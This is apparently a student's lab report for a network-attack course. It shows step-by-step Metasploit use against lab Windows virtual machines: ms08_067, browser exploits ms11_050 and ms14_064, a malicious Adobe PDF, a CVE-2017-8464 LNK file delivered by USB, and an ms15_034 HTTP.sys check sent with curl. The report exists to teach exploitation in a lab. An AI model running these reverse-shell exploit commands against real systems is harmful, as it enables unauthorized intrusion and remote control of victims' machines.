2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

1. 实践内容(3.5分)

   本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

  1.1一个主动攻击实践,如ms08_067; (1分)

  1.2 一个针对浏览器的攻击,如ms11_050;(1分)

  1.3 一个针对客户端的攻击,如Adobe;(1分)

  1.4 成功应用任何一个辅助模块。(0.5分)

任务一 主动攻击实践,ms08_067

靶机:Windows XP 

主机:  Kali

1、输入msfconsole指令,进入控制台,却遇到以下问题,原因是没有连接数据库:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第1张

 2、输入service postgresql start启动数据库,再次进入控制台,输入search ms08-067查看ms08_067这个漏洞在哪里:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第2张

3、选择漏洞use exploit/windows/smb/ms08_067_netapi;

      输入show payloads,查看可以供我们使用的payload:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第3张

4、选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,输入指令set payload generic/shell_reverse_tcp

对payload进行设置;

5、输入show options查看我们需要设置的参数,发现需要设置一个RHOST和一个LHOST:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第4张

6、修改target的值为0,选择我们想要攻击的计算机系统:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第5张

7、输入exploit进行攻击,攻击成功:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第6张

任务二:一个针对浏览器的攻击

1、实现ms11_050的攻击

靶机:Windows XP SP3

主机:  Kali

实验步骤:

搜索漏洞search ms11_050;
使用漏洞use exploit/windows/browser/ms11_050_mshtml_cobjectelement;
设置靶机类型set target 3;
选择攻击载荷set payload generic/shell_reverse_tcp;
使用命令set SRVHOST 192.168.1.238设置地址;
配置好地址后显示配置信息show options;

结果攻击成功:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第7张

2、实现ms14_064的攻击

靶机:Windows XP SP3 English IE8

主机:Kali

实验步骤:

搜索漏洞,然后使用漏洞,使用show payloads查看适用攻击载荷;
选择攻击载荷set payload generic/shell_reverse_tcp;
查看配置信息show options;
而后通过查看配置信息添加所需选项;
设置监听地址、监听端口和url域名;
输入exploit 开始攻击,并在靶机打开IE浏览器输入生成的网址,kali的8080端口监听获得连接,建立会话;
查看开启的会话;

攻击成功截图:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第8张

任务三:一个针对客户端的攻击

一、实现对Adobe的攻击

靶机:Windows XP sp3(English)

1、选择攻击模块,将其载入,选用exploit/windows/fileformat/adobe_toolbutton,如图:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第9张

2、输入命令show payloads选择要使用的payload;

3、输入命令show options查看相关参数设置要求:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第10张

 4、开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个20165236.pdf文件,将该文件传送到靶机上并且在攻击机上打开监听

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第11张

5、将靶机中的pdf文件打开,攻击机成功获取到靶机shell:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第12张

 

二、实现对CVE-2017-8464的攻击

靶机是Win7

实验步骤:

1、使用命令:search CVE:2018 type:exploit查看CVE-2017和2018漏洞有哪些:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第13张

2、使用指令:

msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.19.129
exploit

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第14张

3、将生成的.lnk文件复制到U盘里面,然后在msf中开始监听;

4、将U盘插入靶机中,如图,攻击成功:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第15张

任务四:实现对应用辅助模块的攻击

靶机:windows server 2012 R2

IP:192.168.19.148

实验步骤:

1、使用search use auxiliary/server扫描靶机开发端口:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第16张

2、win2012安装iis服务后访问80端口,检测是否存在漏洞:使用curl发送以下数据:

curl http://192.168.19.148 -H "Host: 192.168.19.148" -H "Range: bytes=0-18446744073709551615",

当出现Requested Range Not Satisfiable时说明存在漏洞;

3、依次输入以下指令进行攻击:

use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
show options
set rhosts 192.168.19.148
set threads 10
exploit

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第17张

4、如图所示,对靶机windows server 2012攻击成功:

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 随笔 第18张

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄